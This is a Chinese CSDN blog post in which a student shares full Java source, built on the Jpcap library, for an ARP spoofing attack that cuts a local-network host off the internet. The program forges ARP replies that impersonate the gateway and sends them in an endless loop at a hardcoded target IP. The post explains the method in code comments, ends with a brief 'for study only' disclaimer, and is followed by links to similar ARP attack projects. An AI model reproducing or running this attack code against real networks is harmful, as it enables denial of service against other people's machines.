java arp 攻击_基于Jpcap的Java ARP断网攻击

于 2021-02-16 01:59:07 发布
阅读量419 收藏 3
点赞数
文章标签: java arp 攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36111677/article/details/114182572
版权
本文介绍了一个使用Java和Jpcap库实现的ARP断网攻击程序,该程序允许在局域网内进行断网攻击作为计算机网络学习的实践。程序通过发送ARP请求和应答包,篡改目标主机的ARP缓存,导致数据无法通过网关正常传输。
摘要由CSDN通过智能技术生成

这是大二学习计算机网络的时候写的一个小程序,可实现局域网内断网攻击。这也作为学习网络层、数据链路层(在OSI模型中ARP协议属于链路层;而在TCP/IP模型中,ARP协议属于网络层)的其中一个小实验吧。

下面的代码运行前需要安装jpcap,安装方法百度一下很多,不过需要注意版本~

代码注释还比较多,部分同学可能还需了解一些计算机网络的知识才能看懂

package com.arpattack;

import java.io.IOException;

import java.net.InetAddress;

import java.util.Arrays;

import jpcap.JpcapCaptor;

import jpcap.JpcapSender;

import jpcap.NetworkInterface;

import jpcap.packet.ARPPacket;

import jpcap.packet.EthernetPacket;

import jpcap.packet.Packet;

/**

* 基于Jpcap的ARP攻击程序范例

* @author 陈祖煌

* @version 1.0

*/

public class ARPAttack {

/**

* 本地主机的0号网络设备,根据具体实际情况对参数0进行修改

*/

public static NetworkInterface device = JpcapCaptor.getDeviceList()[0];

/**

* 通过发送ARP请求包来获取某一IP地址主机的MAC地址。

* @param ip //未知MAC地址主机的IP地址

* @return //已知IP地址的MAC地址

* @throws IOException

*/

public static byte[] getOtherMAC(String ip) throws IOException{

JpcapCaptor jc = JpcapCaptor.openDevice(device,2000,false,3000); //打开网络设备,用来侦听

JpcapSender sender = jc.getJpcapSenderInstance(); //发送器JpcapSender,用来发送报文

InetAddress senderIP = InetAddress.getByName("10.96.33.232"); //设置本地主机的IP地址,方便接收对方返回的报文

InetAddress targetIP = InetAddress.getByName(ip); //目标主机的IP地址

ARPPacket arp=new ARPPacket(); //开始构造一个ARP包

arp.hardtype=ARPPacket.HARDTYPE_ETHER; //硬件类型

arp.prototype=ARPPacket.PROTOTYPE_IP; //协议类型

arp.operation=ARPPacket.ARP_REQUEST; //指明是ARP请求包

arp.hlen=6; //物理地址长度

arp.plen=4; //协议地址长度

arp.sender_hardaddr=device.mac_address; //ARP包的发送端以太网地址,在这里即本地主机地址

arp.sender_protoaddr=senderIP.getAddress(); //发送端IP地址, 在这里即本地IP地址

byte[] broadcast=new byte[]{(byte)255,(byte)255,(byte)255,(byte)255,(byte)255,(byte)255}; //广播地址

arp.target_hardaddr=broadcast; //设置目的端的以太网地址为广播地址

arp.target_protoaddr=targetIP.getAddress(); //目的端IP地址

//构造以太帧首部

EthernetPacket ether=new EthernetPacket();

ether.frametype=EthernetPacket.ETHERTYPE_ARP; //帧类型

ether.src_mac=device.mac_address; //源MAC地址

ether.dst_mac=broadcast; //以太网目的地址,广播地址

arp.datalink=ether; //将arp报文的数据链路层的帧设置为刚刚构造的以太帧赋给

sender.sendPacket(arp); //发送ARP报文

while(true){ //获取ARP回复包,从中提取出目的主机的MAC地址,如果返回的是网关地址,表明目的IP不是局域网内的地址

Packet packet = jc.getPacket();

if(packet instanceof ARPPacket){

ARPPacket p=(ARPPacket)packet;

if(p==null){

throw new IllegalArgumentException(targetIP+" is not a local address"); //这种情况也属于目的主机不是本地地址

}

if(Arrays.equals(p.target_protoaddr,senderIP.getAddress())){

System.out.println("get mac ok");

return p.sender_hardaddr; //返回

}

}

}

}

/**

* 将字符串形式的MAC地址转换成存放在byte数组内的MAC地址

* @param str 字符串形式的MAC地址,如:AA-AA-AA-AA-AA

* @return 保存在byte数组内的MAC地址

*/

public static byte[] stomac(String str) {

byte[] mac = new byte[] { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00 };

String[] temp = str.split("-");

for (int x = 0; x 

mac[x] = (byte) ((Integer.parseInt(temp[x], 16)) & 0xff);

}

return mac;

}

/**

* 执行ARP断网攻击。原理是:冒充网关发送出来的ARP应答包,令接收端更改其ARP缓存表,修改网关IP地址对应的MAC地址,从而令数据无法正常通过网关发出。

* @param ip

* @param time

* @throws InterruptedException

* @throws IOException

*/

public static void ARPAttack(String ip, int time) throws InterruptedException, IOException{

JpcapCaptor jpcap = JpcapCaptor.openDevice(device, 65535, false, 3000);

jpcap.setFilter("arp", true);

JpcapSender sender = JpcapSender.openDevice(device);

ARPPacket arp = new ARPPacket();

arp.hardtype = ARPPacket.HARDTYPE_ETHER;//硬件类型

arp.prototype = ARPPacket.PROTOTYPE_IP; //协议类型

arp.operation = ARPPacket.ARP_REPLY; //指明是ARP应答包包

arp.hlen = 6;

arp.plen = 4;

byte[] srcmac = stomac("00-0D-2B-2E-B1-0A"); // 伪装的MAC地址,这里乱写就行,不过要符合格式、十六进制

arp.sender_hardaddr = srcmac;

arp.sender_protoaddr = InetAddress.getByName("10.96.0.1").getAddress();

arp.target_hardaddr=getOtherMAC(ip);

arp.target_protoaddr=InetAddress.getByName(ip).getAddress();

//设置数据链路层的帧

EthernetPacket ether=new EthernetPacket();

ether.frametype=EthernetPacket.ETHERTYPE_ARP;

ether.src_mac= srcmac; //停止攻击一段时间后,目标主机会自动恢复网络。若要主动恢复,这里可用getOtherMAC("10.96.0.1");

ether.dst_mac=getOtherMAC(ip);

arp.datalink=ether;

// 发送ARP应答包 。因为一般主机会间隔一定时间发送ARP请求包询问网关地址,所以这里需要设置一个攻击周期。

while (true) {

System.out.println("sending ARP..");

sender.sendPacket(arp);

Thread.sleep(time);

}

}

/**

* 程序入口

* @param args

* @throws IOException

* @throws InterruptedException

*/

public static void main(String[] args) throws InterruptedException, IOException {

ARPAttack("10.96.81.56", 2000);

}

}

代码仅供学习研究,切勿用于不良用途。

李士季
关注
JAVA代码实现ARP攻击
10-31
JAVA代码实现ARP攻击 这个文档你们自己看一下吧,大家共同学习
JAVA代码实现ARP攻击
热门推荐
交换一个思想,能得到俩思想
07-05 1万+
ARP攻击原理 一台电脑通过网络访问另一台电脑的时候,在数据链路层需要知道对方的MAC地址进行真正的物理通信. 而电脑上的应用程序通常都是根据另一台电脑的IP地址来和对方建立通信,这时候就需要有一个协议将 IP地址解析到MAC地址,这就是ARP协议. 而ARP具体过程就是当需要通过IP获取一个远端的的MAC地址的时候,系统会首先检查ARP表中 是否存在对应的IP地址,如果没有,则发送一个
基于JAVAARP攻击实现
12-13
本项目请用MyEclipse导入,测试的是用MyEclipse10
arp攻击-java版-内附源码-及使用案例
11-24
arp攻击-java版-内附源码-及使用案例 请妥善使用,重在理解原理,后果自负!
java arp 攻击_arp攻击原理与arp欺骗的原理和应用
weixin_29808375的博客
02-16 266
第一种解决方法处理ARP欺骗攻击最一般的方法就是IP-MAC绑定,可以在客户端主机和网关路由器上双向绑定IP-MAC来避免ARP欺骗导致无法上网。1、在主机上绑定网关路由器的IP和MAC地址,可以通过“arp-S”命令实现。2、在网关路由器上绑定主机的IP地址和MAN地址,可以通过如下命令实现。如果要查看配置结果,可以通过命令“show ip arp”来实现。3、这时候网络中如果有ARP病毒发作...
ARP.zip_ARP java_java arp_jpcap_jpcap a_rarp implementation
09-23
标题中的“ARP.zip_ARP java_java arp_jpcap_jpcap a_rarp implementation”表明这是一个关于使用Java编程语言实现的ARP(Address Resolution Protocol)包发送程序,其中利用了jpcap库来处理网络数据包,并且可能...
Jpcap_Filter.rar_java 数据包_jpcap_jpcap java_包过滤
09-24
public class Jpcap_Filter { public static void main(String[] args) { JpcapCaptor captor = JpcapCaptor.openDevice(JpcapCaptor.getDeviceList()[0], 65535, false, 20); String filter = "tcp"; // 只捕获...
JSniffer.rar_Sniffer_java设计_jpcap_network sniffer_sniffer jpcap
07-15
基于JAVA设计的网络监听程序,使JBuilder 9.0利用Java,借助Wincap和Jpcap这两个工具来对网络底层进行访问,帮助实现网络监听程序
基于JpcapARP断网攻击源码
04-27
### 基于JpcapARP断网攻击原理与实现 #### 一、概述 在网络安全领域,ARP(Address Resolution Protocol)攻击是一种常见的网络威胁手段。本文将深入解析一个基于Jpcap库的ARP断网攻击源码,并对其实现机制进行...
test_Jpcap.rar_jpc_test_Jpcap_test_Jpcap.rar_流量_监控 数据库
09-21
标题中的"test_Jpcap.rar_jpc_test_Jpcap_test_Jpcap.rar_流量_监控 数据库"似乎是一个组合了多次的文件名,主要包含了关键词"Jpcap",这通常指的是Java Packet Capture,一个用于网络封包捕获和分析的库。...
JAVA代码实现ARP攻击 工程完整导出可直接导入
11-28
MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,
java arp jpcap
07-22
java arp jpcap java arp jpcap java arp jpcap java arp jpcap java arp jpcap
ARP攻击小程序
04-23
利用MFC进行开发的一个小程序,可进行局域网内的ARP,简单易懂,适合想学习这方面的童鞋们
ARP killer 局域网内查杀arp攻击的小程序
08-19
ARP killer 局域网内查杀arp攻击的小程序,VC6编
C++ ARP监控小程序
12-21
读取本地机网卡信息,监控ARP请求来源IP地址,MAC地址
gratuitous arp和普通arp报文格式区别_ARP攻击和防御
weixin_39968852的博客
11-18 305
前言在看这篇文章之前,请大家先看下交换机的工作原理,不知大家有没有想过数据链路层中头部协议数据帧的目的MAC地址是如何获取的呢?这就是今天的主角ARP协议,通过广播来获取IP地址对应的MAC地址。问:广播有很多种,交换机可以广播,ARP协议可以广播,IP地址可以广播等等,有啥区别吗?答:交换机广播和ARP协议广播比较容易混淆,因为都是交换机上发生的事情,下面我们来看下这部分,IP地址广播请看路由部...
干货,使用java代码教你如何局域网内ARP攻击
WiteWater的博客
12-13 1491
最近在研读《深入理解计算机网络》,发现好多关于网络知识好匮乏。在看到ARP协议时,就在想java不是有接口可以获取计算机mac地址、ip、网卡等信息,是不是也可以伪造被攻击主机的mac地址进行攻击,使其不能上网。 首先,先熟悉一下ARP协议: 地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进...
java实现ARP欺骗(ARP攻击)-Jpcap
左右的博客
08-31 2907
最近了解到了ARP攻击技术,本着学习的目的,笔者需要在Windows下模拟实施ARP欺骗,主要使用的是Jpcap扩展包来完成这项任务。 准备工作 1.安装WinPcap 官网 , 网盘里面也有 2.下载Jpcap,百度网盘地址 提取码 vu2s 下载完成之后,将Jpcap.dll放到你的jdk/bin下面,将Jpcap.jar引用到你的项目中 代码 import jpcap.JpcapCaptor; import jpcap.JpcapSender; import jpcap.NetworkInterfa
ARP扫描攻击JAVA实现)
HEL_WOR的博客
02-10 9111
转载请注明: http://blog.csdn.net/HEL_WOR/article/details/50650465 前段时间翻看了点计算机网络方面的书,从DNS跳到了ARP协议后,就打算试试一个ARP的扫描攻击程序出来,于是就有了这篇博客现在想想大学的时候我们寝室应该受到ARP扫描攻击了,因为我们寝室的一夜之间连上WIFI后都不能上网了,当时不知道对路由器做静态绑定,于是后面的时间我都是蹭的
使用Jpcap实现ARP欺骗攻击Java代码详解
本资源是一份基于JavaARP(地址解析协议)断网攻击源码,利用了Jpcap库来实现网络包捕获和发送功能。Jpcap一个强大的网络数据包捕获和分析工具,它支持Windows和Linux平台,用于Java环境下的网络编程。在这个ARP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值